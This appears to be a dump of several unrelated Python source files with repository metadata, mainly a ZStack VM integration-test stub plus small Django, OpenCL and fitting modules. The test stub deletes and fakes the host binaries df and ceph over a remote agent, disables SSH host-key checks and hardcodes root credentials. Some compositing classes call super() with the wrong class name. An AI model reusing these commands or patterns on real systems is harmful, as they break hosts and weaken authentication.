% (test_file, vm_ip)
start_time = time.time()
if execute_shell_in_process(cmd, timeout) != 0:
test_util.test_fail('scp test file failed')
end_time = time.time()
os.system('rm -f %s' % test_file)
scp_time = end_time - start_time
if scp_time < TEST_TIME:
if not raise_exception:
test_util.test_logger('network inbound QOS test file failed, since the scp time: %d is smaller than the expected test time: %d. It means the bandwidth limitation: %d KB/s is not effect. ' % (scp_time, TEST_TIME, bandwidth))
return False
test_util.test_fail('network inbound QOS test file failed, since the scp time: %d is smaller than the expected test time: %d. It means the bandwidth limitation: %d KB/s is not effect. ' % (scp_time, TEST_TIME, bandwidth))
else:
test_util.test_logger('network inbound QOS test file pass, since the scp time: %d is bigger than the expected test time: %d. It means the bandwidth limitation: %d KB/s is effect. ' % (scp_time, TEST_TIME, bandwidth))
return True
def test_scp_outbound_speed(source_ip, target_ip, bandwidth, raise_exception = True):
'''
bandwidth unit is KB
'''
timeout = TEST_TIME + 30
cmd = 'ssh -oStrictHostKeyChecking=no -oCheckHostIP=no -oUserKnownHostsFile=/dev/null %s "scp -oStrictHostKeyChecking=no -oCheckHostIP=no -oUserKnownHostsFile=/dev/null %s %s:%s"' \
% (source_ip, test_file, target_ip, test_file)
start_time = time.time()
os.system(cmd)
end_time = time.time()
scp_time = end_time - start_time
if scp_time < TEST_TIME:
if not raise_exception:
test_util.test_logger('network outbound QOS test file failed, since the scp time: %d is smaller than the expected test time: %d. It means the bandwidth limitation: %d KB/s is not effect. ' % (scp_time, TEST_TIME, bandwidth))
return False
test_util.test_fail('network outbound QOS test file failed, since the scp time: %d is smaller than the expected test time: %d. It means the bandwidth limitation: %d KB/s is not effect. ' % (scp_time, TEST_TIME, bandwidth))
else:
test_util.test_logger('network outbound QOS test file pass, since the scp time: %d is bigger than the expected test time: %d. It means the bandwidth limitation: %d KB/s is effect. ' % (scp_time, TEST_TIME, bandwidth))
return True
def install_fio(vm_inv):
timeout = TEST_TIME + 30
vm_ip = vm_inv.vmNics[0].ip
cmd = 'scp /etc/yum.repos.d/zstack-internal-yum.repo root@%s:/etc/yum.repos.d/zstack-internal-yum.repo' % vm_ip
if execute_shell_in_process(cmd, timeout) != 0:
test_util.test_fail('fail to scp zstack-internal-yum.repo.')
ssh_cmd = 'ssh -oStrictHostKeyChecking=no -oCheckHostIP=no -oUserKnownHostsFile=/dev/null %s' % vm_ip
cmd = '%s "mv /etc/yum.repos.d/CentOS-Base.repo /etc/yum.repos.d/epel.repo /etc"' \
% (ssh_cmd)
if execute_shell_in_process(cmd, timeout) != 0:
test_util.test_fail('fail to move CentOS-Base.repo epel.repo.')
cmd = '%s "yum clean metadata"' \
% (ssh_cmd)
if execute_shell_in_process(cmd, timeout) != 0:
test_util.test_fail('fail to clean metadata.')
cmd = '%s "which fio || yum install -y fio --disableplugin=fastestmirror"' \
% (ssh_cmd)
if execute_shell_in_process(cmd, timeout) != 0:
test_util.test_fail('fio installation failed.')
def test_fio_iops(vm_inv, iops, raise_exception = True):
def cleanup_log():
logfd.close()
os.system('rm -f %s' % tmp_file)
timeout = TEST_TIME + 120
vm_ip = vm_inv.vmNics[0].ip
ssh_cmd = 'ssh -oStrictHostKeyChecking=no -oCheckHostIP=no -oUserKnownHostsFile=/dev/null %s' % vm_ip
cmd1 = """%s "fio -ioengine=libaio -bs=4k -direct=1 -thread -rw=write -size=256M -filename=/tmp/test1.img -name='EBS 4k write' -iodepth=64 -runtime=60 -numjobs=4 -group_reporting|grep iops" """ \
% (ssh_cmd)
cmd2 = """%s "fio -ioengine=libaio -bs=4k -direct=1 -thread -rw=write -size=256M -filename=/tmp/test2.img -name='EBS 4k write' -iodepth=64 -runtime=60 -numjobs=4 -group_reporting|grep iops" """ \
% (ssh_cmd)
tmp_file = '/tmp/%s' % uuid.uuid1().get_hex()
logfd = open(tmp_file, 'w', 0)
#rehearsal
execute_shell_in_process(cmd1, timeout)
if execute_shell_in_process(cmd2, timeout, logfd) != 0:
logfd.close()
logfd = open(tmp_file, 'r')
test_util.test_logger('test_fio_bandwidth log: %s ' % '\n'.join(logfd.readlines()))
cleanup_log()
if not raise_exception:
test_util.test_logger('fio test failed.')
return False
test_util.test_fail('fio test failed.')
logfd.close()
logfd = open(tmp_file, 'r')
result_lines = logfd.readlines()
test_util.test_logger('test_fio_bandwidth log: %s ' % '\n'.join(result_lines))
bw=0
for line in result_lines:
if 'iops' in line:
test_util.test_logger('test_fio_bandwidth: %s' % line)
results = line.split()
for result in results:
if 'iops=' in result:
bw = int(float(result[5:]))
#cleanup_log()
if bw == 0:
if not raise_exception:
test_util.test_logger('Did not get bandwidth for fio test')
return False
test_util.test_fail('Did not get bandwidth for fio test')
if bw == iops or bw < (iops - 10):
test_util.test_logger('disk iops: %s is <= setting: %s' % (bw, iops))
return True
else:
test_util.test_logger('disk iops :%s is not same with %s' % (bw, iops))
if raise_exception:
test_util.test_fail('fio bandwidth test fails')
return False
def test_fio_bandwidth(vm_inv, bandwidth, path = '/tmp', raise_exception=True):
def cleanup_log():
logfd.close()
os.system('rm -f %s' % tmp_file)
timeout = TEST_TIME + 360
vm_ip = vm_inv.vmNics[0].ip
ssh_cmd = 'ssh -oStrictHostKeyChecking=no -oCheckHostIP=no -oUserKnownHostsFile=/dev/null %s' % vm_ip
if '/dev/' in path:
cmd1 = """%s "fio -ioengine=libaio -bs=1M -direct=1 -thread -rw=read -size=100M -filename=%s -name='EBS 1M read' -iodepth=64 -runtime=60 -numjobs=4 -group_reporting|grep iops" """ \
% (ssh_cmd, path)
cmd2 = """%s "fio -ioengine=libaio -bs=1M -direct=1 -thread -rw=read -size=900M -filename=%s -name='EBS 1M read' -iodepth=64 -runtime=60 -numjobs=4 -group_reporting|grep iops" """ \
% (ssh_cmd, path)
else:
cmd1 = """%s "fio -ioengine=libaio -bs=1M -direct=1 -thread -rw=write -size=100M -filename=%s/test1.img -name='EBS 1M write' -iodepth=64 -runtime=60 -numjobs=4 -group_reporting|grep iops" """ \
% (ssh_cmd, path)
cmd2 = """%s "fio -ioengine=libaio -bs=1M -direct=1 -thread -rw=write -size=900M -filename=%s/test2.img -name='EBS 1M write' -iodepth=64 -runtime=60 -numjobs=4 -group_reporting|grep iops" """ \
% (ssh_cmd, path)
tmp_file = '/tmp/%s' % uuid.uuid1().get_hex()
logfd = open(tmp_file, 'w', 0)
#rehearsal
execute_shell_in_process(cmd1, timeout)
if execute_shell_in_process(cmd2, timeout, logfd) != 0:
logfd.close()
logfd = open(tmp_file, 'r')
test_util.test_logger('test_fio_bandwidth log: %s ' % '\n'.join(logfd.readlines()))
cleanup_log()
if not raise_exception:
test_util.test_logger('fio test failed.')
return False
test_util.test_fail('fio test failed.')
logfd.close()
logfd = open(tmp_file, 'r')
result_lines = logfd.readlines()
test_util.test_logger('test_fio_bandwidth log: %s ' % '\n'.join(result_lines))
bw=0
for line in result_lines:
if 'iops' in line:
test_util.test_logger('test_fio_bandwidth: %s' % line)
results = line.split()
for result in results:
if 'bw=' in result:
if 'MB' in result:
bw = int(float(result[3:].split('MB')[0])) * 1024
else:
bw = int(float(result[3:].split('KB')[0]))
#cleanup_log()
if bw == 0:
if not raise_exception:
test_util.test_logger('Did not get bandwidth for fio test')
return False
test_util.test_fail('Did not get bandwidth for fio test')
threshold = bandwidth/1024/2
bw_up_limit = bandwidth/1024 + threshold
bw_down_limit = bandwidth/1024 - threshold
if bw > bw_down_limit and bw < bw_up_limit:
test_util.test_logger('disk bandwidth:%s is between %s and %s' \
% (bw, bw_down_limit, bw_up_limit))
return True
else:
test_util.test_logger('disk bandwidth:%s is not between %s and %s' \
% (bw, bw_down_limit, bw_up_limit))
if raise_exception:
test_util.test_fail('fio bandwidth test fails')
return False
def create_volume(volume_creation_option=None, session_uuid = None):
if not volume_creation_option:
disk_offering_uuid = res_ops.query_resource(res_ops.DISK_OFFERING)[0].uuid
volume_creation_option = test_util.VolumeOption()
volume_creation_option.set_disk_offering_uuid(disk_offering_uuid)
volume_creation_option.set_name('vr_test_volume')
volume_creation_option.set_session_uuid(session_uuid)
volume = zstack_volume_header.ZstackTestVolume()
volume.set_creation_option(volume_creation_option)
volume.create()
return volume
def migrate_vm_to_random_host(vm, timeout = None):
test_util.test_dsc("migrate vm to random host")
target_host = test_lib.lib_find_random_host(vm.vm)
current_host = test_lib.lib_find_host_by_vm(vm.vm)
vm.migrate(target_host.uuid, timeout)
new_host = test_lib.lib_get_vm_host(vm.vm)
if not new_host:
test_util.test_fail('Not find available Hosts to do migration')
if new_host.uuid != target_host.uuid:
test_util.test_fail('[vm:] did not migrate from [host:] %s to target [host:] %s, but to [host:] %s' % (vm.vm.uuid, current_host.uuid, target_host.uuid, new_host.uuid))
else:
test_util.test_logger('[vm:] %s has been migrated from [host:] %s to [host:] %s' % (vm.vm.uuid, current_host.uuid, target_host.uuid))
def create_eip(eip_name=None, vip_uuid=None, vnic_uuid=None, vm_obj=None, \
session_uuid = None):
if not vip_uuid:
l3_name = os.environ.get('l3PublicNetworkName')
l3_uuid = test_lib.lib_get_l3_by_name(l3_name).uuid
vip_uuid = net_ops.acquire_vip(l3_uuid).uuid
eip_option = test_util.EipOption()
eip_option.set_name(eip_name)
eip_option.set_vip_uuid(vip_uuid)
eip_option.set_vm_nic_uuid(vnic_uuid)
eip_option.set_session_uuid(session_uuid)
eip = zstack_eip_header.ZstackTestEip()
eip.set_creation_option(eip_option)
if vnic_uuid and not vm_obj:
test_util.test_fail('vm_obj can not be None in create_eip() API, when setting vm_nic_uuid.')
eip.create(vm_obj)
return eip
def create_vip(vip_name=None, l3_uuid=None, session_uuid = None, required_ip=None):
if not vip_name:
vip_name = 'test vip'
if not l3_uuid:
l3_name = os.environ.get('l3PublicNetworkName')
l3_uuid = test_lib.lib_get_l3_by_name(l3_name).uuid
vip_creation_option = test_util.VipOption()
vip_creation_option.set_name(vip_name)
vip_creation_option.set_l3_uuid(l3_uuid)
vip_creation_option.set_session_uuid(session_uuid)
vip_creation_option.set_requiredIp(required_ip)
vip = zstack_vip_header.ZstackTestVip()
vip.set_creation_option(vip_creation_option)
vip.create()
return vip
def create_vip_with_ip(vip_name=None, l3_uuid=None, required_ip=None, session_uuid = None):
if not vip_name:
vip_name = 'test vip'
if not l3_uuid:
l3_name = os.environ.get('l3PublicNetworkName')
l3_uuid = test_lib.lib_get_l3_by_name(l3_name).uuid
vip_creation_option = test_util.VipOption()
vip_creation_option.set_name(vip_name)
vip_creation_option.set_l3_uuid(l3_uuid)
vip_creation_option.set_requiredIp(required_ip)
vip_creation_option.set_session_uuid(session_uuid)
vip = zstack_vip_header.ZstackTestVip()
vip.set_creation_option(vip_creation_option)
vip.create()
return vip
def attach_mount_volume(volume, vm, mount_point):
volume.attach(vm)
import tempfile
script_file = tempfile.NamedTemporaryFile(delete=False)
script_file.write('''
mkdir -p %s
device="/dev/`ls -ltr --file-type /dev | grep disk | awk '{print $NF}' | grep -v '[[:digit:]]' | tail -1`"
mount ${device}1 %s
''' % (mount_point, mount_point))
script_file.close()
vm_inv = vm.get_vm()
if not test_lib.lib_execute_shell_script_in_vm(vm_inv, script_file.name):
test_util.test_fail("mount operation failed in [volume:] %s in [vm:] %s" % (volume.get_volume().uuid, vm_inv.uuid))
os.unlink(script_file.name)
def time_convert(log_str):
time_str = log_str.split()[0]+' '+log_str.split()[1]
time_microscond = time_str.split(',')[1]
time_str = time_str.split(',')[0]
time_tuple = time.strptime(time_str, "%Y-%m-%d %H:%M:%S")
return int(time.mktime(time_tuple)*1000+int(time_microscond))
def get_stage_time(vm_name, begin_time):
mn_server_log = "/usr/local/zstacktest/apache-tomcat/logs/management-server.log"
file_obj = open(mn_server_log)
for line in file_obj.readlines():
if line.find('APICreateVmInstanceMsg') != -1 and line.find(vm_name) != -1:
time_stamp = time_convert(line)
if int(time_stamp) >= begin_time:
api_id = line.split('{"', 1)[1].split(',')[-3].split(':')[1].strip('"')
break
file_obj.close
log_str = ''
select_bs_time = select_bs_end_time = select_bs_begin_time = 0
allocate_host_time = allocate_host_end_time = allocate_host_begin_time = 0
allocate_ps_time = allocate_ps_end_time = allocate_ps_begin_time = 0
local_storage_allocate_capacity_time = local_storage_allocate_capacity_end_time = local_storage_allocate_capacity_begin_time = 0
allocate_volume_time = allocate_volume_end_time = allocate_volume_begin_time = 0
allocate_nic_time = allocate_nic_end_time = allocate_nic_begin_time = 0
instantiate_res_time = instantiate_res_end_time = instantiate_res_begin_time = 0
instantiate_res_pre_time = instantiate_res_pre_end_time = instantiate_res_pre_begin_time = 0
create_on_hypervisor_time = create_on_hypervisor_end_time = create_on_hypervisor_begin_time = 0
instantiate_res_post_time = instantiate_res_post_end_time = instantiate_res_post_begin_time = 0
file_obj = open(mn_server_log)
for line in file_obj.readlines():
if line.find(api_id) != -1 and line.find('SimpleFlowChain') != -1 and line.find('VmImageSelectBackupStorageFlow') != -1 and line.find('start executing flow') != -1:
select_bs_begin_time = time_convert(line)
if line.find(api_id) != -1 and line.find('SimpleFlowChain') != -1 and line.find('VmImageSelectBackupStorageFlow') != -1 and line.find('successfully executed flow') != -1:
select_bs_end_time = time_convert(line)
if line.find(api_id) != -1 and line.find('SimpleFlowChain') != -1 and line.find('VmAllocateHostFlow') != -1 and line.find('start executing flow') != -1:
allocate_host_begin_time = time_convert(line)
if line.find(api_id) != -1 and line.find('SimpleFlowChain') != -1 and line.find('VmAllocateHostFlow') != -1 and line.find('successfully executed flow') != -1:
allocate_host_end_time = time_convert(line)
if line.find(api_id) != -1 and line.find('SimpleFlowChain') != -1 and line.find('VmAllocatePrimaryStorageFlow') != -1 and line.find('start executing flow') != -1:
allocate_ps_begin_time = time_convert(line)
if line.find(api_id) != -1 and line.find('SimpleFlowChain') != -1 and line.find('VmAllocatePrimaryStorageFlow') != -1 and line.find('successfully executed flow') != -1:
allocate_ps_end_time = time_convert(line)
if line.find(api_id) != -1 and line.find('SimpleFlowChain') != -1 and line.find('LocalStorageAllocateCapacityFlow') != -1 and line.find('start executing flow') != -1:
local_storage_allocate_capacity_begin_time = time_convert(line)
if line.find(api_id) != -1 and line.find('SimpleFlowChain') != -1 and line.find('LocalStorageAllocateCapacityFlow') != -1 and line.find('successfully executed flow') != -1:
local_storage_allocate_capacity_end_time = time_convert(line)
if line.find(api_id) != -1 and line.find('SimpleFlowChain') != -1 and line.find('VmAllocateVolumeFlow') != -1 and line.find('start executing flow') != -1:
allocate_volume_begin_time = time_convert(line)
if line.find(api_id) != -1 and line.find('SimpleFlowChain') != -1 and line.find('VmAllocateVolumeFlow') != -1 and line.find('successfully executed flow') != -1:
allocate_volume_end_time = time_convert(line)
if line.find(api_id) != -1 and line.find('SimpleFlowChain') != -1 and line.find('VmAllocateNicFlow') != -1 and line.find('start executing flow') != -1:
allocate_nic_begin_time = time_convert(line)
if line.find(api_id) != -1 and line.find('SimpleFlowChain') != -1 and line.find('VmAllocateNicFlow') != -1 and line.find('successfully executed flow') != -1:
allocate_nic_end_time = time_convert(line)
if line.find(api_id) != -1 and line.find('SimpleFlowChain') != -1 and line.find('VmInstantiateResourcePreFlow') != -1 and line.find('start executing flow') != -1:
instantiate_res_pre_begin_time = time_convert(line)
if line.find(api_id) != -1 and line.find('SimpleFlowChain') != -1 and line.find('VmInstantiateResourcePreFlow') != -1 and line.find('successfully executed flow') != -1:
instantiate_res_pre_end_time = time_convert(line)
if line.find(api_id) != -1 and line.find('SimpleFlowChain') != -1 and line.find('VmCreateOnHypervisorFlow') != -1 and line.find('start executing flow') != -1:
create_on_hypervisor_begin_time = time_convert(line)
if line.find(api_id) != -1 and line.find('SimpleFlowChain') != -1 and line.find('VmCreateOnHypervisorFlow') != -1 and line.find('successfully executed flow') != -1:
create_on_hypervisor_end_time = time_convert(line)
if line.find(api_id) != -1 and line.find('SimpleFlowChain') != -1 and line.find('VmInstantiateResourcePostFlow') != -1 and line.find('start executing flow') != -1:
instantiate_res_post_begin_time = time_convert(line)
if line.find(api_id) != -1 and line.find('SimpleFlowChain') != -1 and line.find('VmInstantiateResourcePostFlow') != -1 and line.find('successfully executed flow') != -1:
instantiate_res_post_end_time = time_convert(line)
file_obj.close()
if select_bs_end_time != 0 and select_bs_begin_time != 0:
select_bs_time = select_bs_end_time - select_bs_begin_time
if allocate_host_end_time != 0 and allocate_host_begin_time != 0:
allocate_host_time = allocate_host_end_time - allocate_host_begin_time
if allocate_ps_end_time != 0 and allocate_ps_begin_time != 0:
allocate_ps_time = allocate_ps_end_time - allocate_ps_begin_time
if local_storage_allocate_capacity_end_time != 0 and local_storage_allocate_capacity_begin_time != 0:
local_storage_allocate_capacity_time = local_storage_allocate_capacity_end_time - local_storage_allocate_capacity_begin_time
if allocate_volume_end_time != 0 and allocate_volume_begin_time != 0:
allocate_volume_time = allocate_volume_end_time - allocate_volume_begin_time
if allocate_nic_end_time != 0 and allocate_volume_begin_time != 0:
allocate_nic_time = allocate_nic_end_time - allocate_nic_begin_time
if instantiate_res_pre_end_time != 0 and instantiate_res_pre_begin_time != 0:
instantiate_res_pre_time = instantiate_res_pre_end_time - instantiate_res_pre_begin_time
if create_on_hypervisor_end_time != 0 and create_on_hypervisor_begin_time != 0:
create_on_hypervisor_time = create_on_hypervisor_end_time - create_on_hypervisor_begin_time
if instantiate_res_post_end_time != 0 and instantiate_res_post_begin_time != 0:
instantiate_res_post_time = instantiate_res_post_end_time - instantiate_res_post_begin_time
return [select_bs_time, allocate_host_time, allocate_ps_time, local_storage_allocate_capacity_time, allocate_volume_time, allocate_nic_time, instantiate_res_pre_time, create_on_hypervisor_time, instantiate_res_post_time]
def setup_fake_df(host, total, avail):
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, "ls /usr/bin/df.real")
if rsp.return_code != 0:
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, 'cp /usr/bin/df /usr/bin/df.real')
used = int(total) - int(avail)
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, '''echo "echo 'Filesystem 1K-blocks Used Available Use% Mounted on'" >/usr/bin/df.fake''')
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, '''echo "echo '/dev/vda1 %s %s %s 2%% /'" >>/usr/bin/df.fake''' % (total, used, avail))
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, 'rm -rf /usr/bin/df; ln -s /usr/bin/df.fake /usr/bin/df; chmod a+x /usr/bin/df')
def remove_fake_df(host):
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, "ls /usr/bin/df.real")
if rsp.return_code == 0:
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, 'rm -rf /usr/bin/df; ln -s /usr/bin/df.real /usr/bin/df')
def setup_fake_fs(host, total, path):
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, "mount -t tmpfs -o size=%s tmpfs %s" % (total, path))
def remove_fake_fs(host, path):
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, "umount %s" % (path))
def setup_fake_ceph(host, total, avail):
test_lib.lib_install_testagent_to_host(host)
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, "ls /usr/bin/ceph.real")
if rsp.return_code != 0:
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, 'cp /usr/bin/ceph /usr/bin/ceph.real')
used = int(total) - int(avail)
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, '''echo '[ "$1 $2 $3" != "df -f json" ] && ceph.real "$@"' >/usr/bin/ceph.fake''')
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, '''echo '[ "$1 $2 $3" != "df -f json" ] && exit' >>/usr/bin/ceph.fake''')
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, "/usr/bin/ceph.real df -f json")
df = jsonobject.loads(rsp.stdout)
df.stats.total_bytes = total
df.stats.total_avail_bytes = avail
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, '''echo "echo ''" >>/usr/bin/ceph.fake''')
string = jsonobject.dumps(df).replace('"', '\\"')
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, '''echo "echo '%s'" >>/usr/bin/ceph.fake''' % (string))
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, 'rm -rf /usr/bin/ceph; ln -s /usr/bin/ceph.fake /usr/bin/ceph; chmod a+x /usr/bin/ceph')
def remove_fake_ceph(host):
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, "ls /usr/bin/ceph.real")
if rsp.return_code == 0:
rsp = test_lib.lib_execute_sh_cmd_by_agent(host.managementIp, 'rm -rf /usr/bin/ceph; ln -s /usr/bin/ceph.real /usr/bin/ceph')
def run_command_in_vm(vm_inv, command):
managerip = test_lib.lib_find_host_by_vm(vm_inv).managementIp
vm_ip = vm_inv.vmNics[0].ip
return test_lib.lib_ssh_vm_cmd_by_agent(managerip, vm_ip, 'root', 'password', command)
|
zstackio/zstack-woodpecker
|
integrationtest/vm/virt_plus/test_stub.py
|
Python
|
apache-2.0
| 33,035 | 0.007083 |
"""
Copyright (c) 2012-2020 RockStor, Inc. <http://rockstor.com>
This file is part of RockStor.
RockStor is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published
by the Free Software Foundation; either version 2 of the License,
or (at your option) any later version.
RockStor is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from smart_manager.models import CPUMetric
from smart_manager.serializers import CPUMetricSerializer
from generic_sprobe import GenericSProbeView
class CPUMetricView(GenericSProbeView):
serializer_class = CPUMetricSerializer
model_obj = CPUMetric
|
rockstor/rockstor-core
|
src/rockstor/smart_manager/views/cpu_util.py
|
Python
|
gpl-3.0
| 963 | 0 |
from django.template import Context, loader
from pokemon.models import Pokemon
from django.http import HttpResponse
from django.http import Http404
def index(request):
Pokemons = Pokemon.objects.all().order_by('id_pokemon')
t = loader.get_template('pokemon/index.html')
c = Context({
'Pokemons': Pokemons,
})
return HttpResponse(t.render(c))
def pokemon(request, id):
try:
Pkmn = Pokemon.objects.get(id_pokemon=id)
except Pokemon.DoesNotExist:
raise Http404
return HttpResponse(loader.get_template('pokemon/pokemon.html').render(Context({'Pokemon': Pkmn,})))
|
pgrimaud/django-pokedex
|
pokemon/views.py
|
Python
|
mit
| 616 | 0.008117 |
#
# Copyright (c) 2011 Red Hat, Inc.
#
# This software is licensed to you under the GNU Lesser General Public
# License as published by the Free Software Foundation; either version
# 2 of the License (LGPLv2) or (at your option) any later version.
# There is NO WARRANTY for this software, express or implied,
# including the implied warranties of MERCHANTABILITY,
# NON-INFRINGEMENT, or FITNESS FOR A PARTICULAR PURPOSE. You should
# have received a copy of LGPLv2 along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/lgpl-2.0.txt.
#
# Jeff Ortel <jortel@redhat.com>
#
"""
The I{metrics} module defines classes and other resources
designed for collecting and reporting performance metrics.
"""
import time
from math import modf
class Timer:
def __init__(self, started=0, stopped=0):
self.started = started
self.stopped = stopped
def start(self):
self.started = time.time()
self.stopped = 0
return self
def stop(self):
if self.started > 0:
self.stopped = time.time()
return self
def duration(self):
return ( self.stopped - self.started )
def __str__(self):
if self.started == 0:
return 'not-running'
if self.started > 0 and self.stopped == 0:
return 'started: %d (running)' % self.started
duration = self.duration()
jmod = ( lambda m : (m[1], m[0]*1000) )
if duration < 1:
ms = (duration*1000)
return '%d (ms)' % ms
if duration < 60:
m = modf(duration)
return '%d.%.3d (seconds)' % jmod(m)
m = modf(duration/60)
return '%d.%.3d (minutes)' % jmod(m)
|
splice/gofer
|
src/gofer/metrics.py
|
Python
|
lgpl-2.1
| 1,728 | 0.004051 |
__version_info__ = ('1', '0', '0')
__version__ = '.'.join(__version_info__)
|
bmmalone/pymisc-utils
|
pyllars/__init__.py
|
Python
|
mit
| 76 | 0 |
from copper.cop.cop_node import CopNode
import pyopencl as cl
import numpy
from PIL import Image
class COP2_Comp_Add(CopNode):
'''
This filter adds foreground over background using OpenCL
'''
type_name = "add"
category = "comps"
def __init__(self, engine, parent):
super(CLC_Comp_Add, self).__init__(engine, parent)
self.program = engine.load_program("comp_add.cl")
self.__inputs__ = [None, None]
self.__input_names__ = ["Input 1","Input 2"]
def compute(self):
self.width, self.height = self.input(0).size
self.devOutBuffer = cl.Image(self.engine.ctx, self.engine.mf.READ_WRITE, self.image_format, shape=(self.width, self.height))
sampler = cl.Sampler(self.engine.ctx,
True, # Normalized coordinates
cl.addressing_mode.CLAMP_TO_EDGE,
cl.filter_mode.LINEAR)
exec_evt = self.program.run_add(self.engine.queue, self.size, None,
self.input(0).getOutDevBuffer(),
self.input(1).getOutDevBuffer(),
self.devOutBuffer,
sampler,
numpy.int32(self.width),
numpy.int32(self.height),
)
exec_evt.wait()
class COP2_Comp_Blend(CopNode):
'''
This filter blends foreground over background using OpenCL
'''
type_name = "blend"
category = "comps"
def __init__(self, engine, parent):
super(CLC_Comp_Blend, self).__init__(engine, parent)
self.program = engine.load_program("comp_blend.cl")
self.__inputs__ = [None, None]
self.__input_names__ = ["Input 1","Input 2"]
self.addParameter("factor", float, 0.5)
def bypass_node(self):
factor = self.parm("factor").evalAsFloat()
if factor <= 0.0:
self.log("Bypassing with node %s at input 0" % (self.input(0).path()))
return self.input(0)
if factor >= 1.0:
self.log("Bypassing with node %s at input 1" % (self.input(1).path()))
return self.input(1)
return None
def compute(self):
self.width, self.height = self.input(0).size
self.devOutBuffer = cl.Image(self.engine.ctx, self.engine.mf.READ_WRITE, self.image_format, shape=(self.width, self.height))
sampler = cl.Sampler(self.engine.ctx,
True, # Normalized coordinates
cl.addressing_mode.CLAMP_TO_EDGE,
cl.filter_mode.LINEAR)
exec_evt = self.program.run_blend(self.engine.queue, self.size, None,
self.input(0).getOutDevBuffer(),
self.input(1).getOutDevBuffer(),
self.devOutBuffer,
sampler,
numpy.int32(self.width),
numpy.int32(self.height),
numpy.float32(self.parm("factor").evalAsFloat())
)
exec_evt.wait()
|
cinepost/Copperfield_FX
|
copper/cop/cop_comps.py
|
Python
|
unlicense
| 2,456 | 0.041938 |
"""Scikit Flow Estimators."""
# Copyright 2015-present The Scikit Flow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.learn.python.learn.estimators.base import TensorFlowEstimator, TensorFlowBaseTransformer
from tensorflow.contrib.learn.python.learn.estimators.linear import TensorFlowLinearClassifier
from tensorflow.contrib.learn.python.learn.estimators.linear import TensorFlowClassifier
from tensorflow.contrib.learn.python.learn.estimators.linear import TensorFlowLinearRegressor
from tensorflow.contrib.learn.python.learn.estimators.linear import TensorFlowRegressor
from tensorflow.contrib.learn.python.learn.estimators.dnn import TensorFlowDNNClassifier
from tensorflow.contrib.learn.python.learn.estimators.dnn import TensorFlowDNNRegressor
from tensorflow.contrib.learn.python.learn.estimators.rnn import TensorFlowRNNClassifier
from tensorflow.contrib.learn.python.learn.estimators.rnn import TensorFlowRNNRegressor
from tensorflow.contrib.learn.python.learn.estimators.autoencoder import TensorFlowDNNAutoencoder
from tensorflow.contrib.learn.python.learn.estimators.run_config import RunConfig
|
shishaochen/TensorFlow-0.8-Win
|
tensorflow/contrib/learn/python/learn/estimators/__init__.py
|
Python
|
apache-2.0
| 1,777 | 0.00619 |
from django import forms
from models import edi_address
class DocumentForm(forms.ModelForm):
docfile = forms.FileField()
class Meta:
model = edi_address
fields = ["docfile",]
|
codelab-mx/edi-translator
|
data_mining/forms.py
|
Python
|
gpl-3.0
| 193 | 0.036269 |
from matplotlib import rcParams, rc
from spuriousRadioProbRangeP1 import probsOfGRP
from util import mpfit
from util.fitFunctions import gaussian
import matplotlib.pyplot as plt
import numpy as np
import matplotlib
import scipy.stats
import tables
import scipy.special
def fitGauss(xdata,ydata,yerr,flatLine=False):
nBins=100
amplitude = .5*np.max(ydata)
x_offset = xdata[np.argmax(ydata)]
sigma = (np.max(xdata)-np.min(xdata))/10.
y_offset = 3.
fixed = [False]*4
if flatLine == True:
amplitude = 0
fixed[0:3] = [True]*3
params=[sigma, x_offset, amplitude, y_offset] # First guess at fit params
errs = yerr
errs[np.where(errs == 0.)] = 1.
quiet = True
parinfo = [ {'n':0,'value':params[0],'limits':[.0001, .1], 'limited':[True,True],'fixed':fixed[0],'parname':"Sigma",'error':0},
{'n':1,'value':params[1],'limits':[x_offset-sigma*3, x_offset+sigma*3],'limited':[True,True],'fixed':fixed[1],'parname':"x offset",'error':0},
{'n':2,'value':params[2],'limits':[.2*amplitude, 3.*amplitude],'limited':[True,True],'fixed':fixed[2],'parname':"Amplitude",'error':0},
{'n':3,'value':params[3],'limited':[False,False],'fixed':fixed[3],'parname':"y_offset",'error':0}]
fa = {'x':xdata,'y':ydata,'err':yerr}
m = mpfit.mpfit(gaussian, functkw=fa, parinfo=parinfo, maxiter=1000, quiet=quiet)
if m.status <= 0:
print m.status, m.errmsg
mpp = m.params #The fit params
mpperr = m.perror
for k,p in enumerate(mpp):
parinfo[k]['value'] = p
parinfo[k]['error'] = mpperr[k]
#print parinfo[k]['parname'],p," +/- ",mpperr[j]
if k==0: sigma = p
if k==1: x_offset = p
if k==2: amplitude = p
if k==3: y_offset = p
